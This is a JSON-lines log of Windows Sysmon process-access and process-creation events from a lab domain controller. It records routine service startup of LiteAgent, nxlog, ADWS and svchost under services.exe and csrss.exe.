{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1186,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.328\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nSourceProcessId: 852\r\nSourceThreadId: 948\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001072BF0200}\r\nTargetProcessId: 2460\r\nTargetImage: C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.328","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","SourceProcessId":"852","SourceThreadId":"948","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001072BF0200}","TargetProcessId":"2460","TargetImage":"C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1187,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.328\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001072BF0200}\r\nTargetProcessId: 2460\r\nTargetImage: C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.328","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001072BF0200}","TargetProcessId":"2460","TargetImage":"C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1188,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.317\r\nProcessGuid: {E2A3D6B1-106B-5F25-0000-001089BF0200}\r\nProcessId: 2508\r\nImage: C:\\Program Files\\Amazon\\XenTools\\LiteAgent.exe\r\nFileVersion: 1.0\r\nDescription: xenagent\r\nProduct: XENIFACE\r\nCompany: Amazon Inc.\r\nOriginalFileName: xenagent.exe\r\nCommandLine: \"C:\\Program Files\\Amazon\\XenTools\\LiteAgent.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=3727559C2C2FE26EE668086FAF992815,SHA256=8130E7A850E0A088CB46F2595F7418CE9D73CE2F7750FC017ABC5CF3DED05F06,IMPHASH=C8B18E9A517CB77EA7AB3E7295D84FE8\r\nParentProcessGuid: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nParentProcessId: 852\r\nParentImage: C:\\Windows\\System32\\services.exe\r\nParentCommandLine: C:\\Windows\\system32\\services.exe","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.317","ProcessGuid":"{E2A3D6B1-106B-5F25-0000-001089BF0200}","Image":"C:\\Program Files\\Amazon\\XenTools\\LiteAgent.exe","FileVersion":"1.0","Description":"xenagent","Product":"XENIFACE","Company":"Amazon Inc.","OriginalFileName":"xenagent.exe","CommandLine":"\"C:\\Program Files\\Amazon\\XenTools\\LiteAgent.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=3727559C2C2FE26EE668086FAF992815,SHA256=8130E7A850E0A088CB46F2595F7418CE9D73CE2F7750FC017ABC5CF3DED05F06,IMPHASH=C8B18E9A517CB77EA7AB3E7295D84FE8","ParentProcessGuid":"{E2A3D6B1-1058-5F25-0000-001030530000}","ParentProcessId":"852","ParentImage":"C:\\Windows\\System32\\services.exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1189,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.328\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nSourceProcessId: 852\r\nSourceThreadId: 912\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001089BF0200}\r\nTargetProcessId: 2508\r\nTargetImage: C:\\Program Files\\Amazon\\XenTools\\LiteAgent.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\services.exe+12bee|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.328","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","SourceProcessId":"852","SourceThreadId":"912","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001089BF0200}","TargetProcessId":"2508","TargetImage":"C:\\Program Files\\Amazon\\XenTools\\LiteAgent.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\services.exe+12bee|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1190,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.328\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001089BF0200}\r\nTargetProcessId: 2508\r\nTargetImage: C:\\Program Files\\Amazon\\XenTools\\LiteAgent.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.328","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001089BF0200}","TargetProcessId":"2508","TargetImage":"C:\\Program Files\\Amazon\\XenTools\\LiteAgent.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1191,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.328\r\nProcessGuid: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nProcessId: 2116\r\nImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files (x86)\\nxlog\\nxlog.exe\" -c \"C:\\Program Files (x86)\\nxlog\\conf\\nxlog.conf\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=EDE0FA11A10EF649A05AC992D0231673,SHA256=B66FA8592904D8502747C78C79D5B3E86C9ED7383A8159209BB2740BB92070EC,IMPHASH=517158273EC1C6D5E65120E91DD2284A\r\nParentProcessGuid: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nParentProcessId: 852\r\nParentImage: C:\\Windows\\System32\\services.exe\r\nParentCommandLine: C:\\Windows\\system32\\services.exe","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.328","ProcessGuid":"{E2A3D6B1-106B-5F25-0000-001054C00200}","Image":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files (x86)\\nxlog\\nxlog.exe\" -c \"C:\\Program Files (x86)\\nxlog\\conf\\nxlog.conf\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=EDE0FA11A10EF649A05AC992D0231673,SHA256=B66FA8592904D8502747C78C79D5B3E86C9ED7383A8159209BB2740BB92070EC,IMPHASH=517158273EC1C6D5E65120E91DD2284A","ParentProcessGuid":"{E2A3D6B1-1058-5F25-0000-001030530000}","ParentProcessId":"852","ParentImage":"C:\\Windows\\System32\\services.exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1192,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.330\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nSourceProcessId: 852\r\nSourceThreadId: 1116\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nTargetProcessId: 2116\r\nTargetImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\services.exe+12bee|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.330","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","SourceProcessId":"852","SourceThreadId":"1116","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","TargetProcessId":"2116","TargetImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\services.exe+12bee|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1193,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.330\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nTargetProcessId: 2116\r\nTargetImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.330","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","TargetProcessId":"2116","TargetImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1194,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.332\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-00102AC00200}\r\nTargetProcessId: 2500\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.332","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-00102AC00200}","TargetProcessId":"2500","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1195,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.332\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nSourceProcessId: 852\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-00102AC00200}\r\nTargetProcessId: 2500\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.332","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","SourceProcessId":"852","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-00102AC00200}","TargetProcessId":"2500","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
